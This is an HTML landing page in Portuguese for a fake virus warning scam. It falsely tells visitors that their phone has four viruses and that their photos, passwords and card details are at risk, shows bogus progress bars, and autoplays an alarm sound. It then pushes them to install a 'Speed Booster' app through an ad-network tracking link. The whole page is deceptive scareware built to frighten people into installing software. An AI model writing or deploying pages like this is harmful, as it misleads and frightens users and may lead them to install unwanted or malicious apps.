<!DOCTYPE HTML>
<html lang="en">

  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Warning!</title>

    <!-- CSS  -->
    <link href="css/style.css" rel="stylesheet">
    <link href="css/fonts.css" rel="stylesheet">

    <!-- fonts -->
    <link href="https://fonts.googleapis.com/css?family=Numans" rel="stylesheet">

  </head>

  <body>

    <div class="wrapper">

      <header class="attention">
        <img src="assets/pictures/attention.svg" class="attention-img">
        <h1 class="attention-caption">Warning</h1>
      </header>

      <h2 class="caption">O seu <span id="model"></span> pode ter (4) Virus!</h2>

      <div class="info__container">

        <div class="info__texts">

          <p class="info-text text-red">Pode ter sido infetado com os wirus enquanto navegava em websites inseguros no dia</p>
          <p class="info-text text-gray"><span class="text-uppercase">atencao!</span> As suas fotografias privadas, dados do Facebook, palavras-passe e infoemacoes sorbe o seu cartao de credito estao em risco.</p>

        </div>

        <img src="assets/pictures/robot.png" class="info-img">

      </div>

      <div class="progress-bar__container">

        <p class="progress-bar-text">Current Speed : 67%</p>
        <div id="seconds" class="seconds">
          <div id="bar" class="bar animating"></div>
        </div>

        <p class="progress-bar-text">Avaliable Speed : 33%</p>
        <div id="seconds" class="seconds">
          <div id="bar" class="bar animating-small"></div>
        </div>

      </div>

      <div class="content__container">

        <h3 class="content-caption">Como remover virus:</h3>
        <p class="content-text"><b>Passo 1:</b> Tocar no botao e instalar "Speed Booster" gratis!</p>
        <p class="content-text"><b>Passo 2:</b> Abrir a aplicacao e remover agora todos os virus!</p>
        <p class="content-text"><b>Passo 3:</b> Mantenha o aplicativo por um minimo de 7 dias para remover completamente todos os virus e evitar novos ataques.</p>

      </div>

      <p class="btn"><a href="http://adbomb.pro/click.php?lp=1" class="btn-link">Remover agora todos
        <br> Os virus!
      </a></p>

    </div>

    <!-- JS -->
    <script src="node_modules/mobile-detect/mobile-detect.min.js"></script>
    <script src="js/model.js"></script>

    <audio autoplay="autoplay" preload="">
        <source src="http://my.stratads.online/sweeps/pl/lp7/alert.ogg" type="audio/ogg">
    </audio>

  </body>

</html>
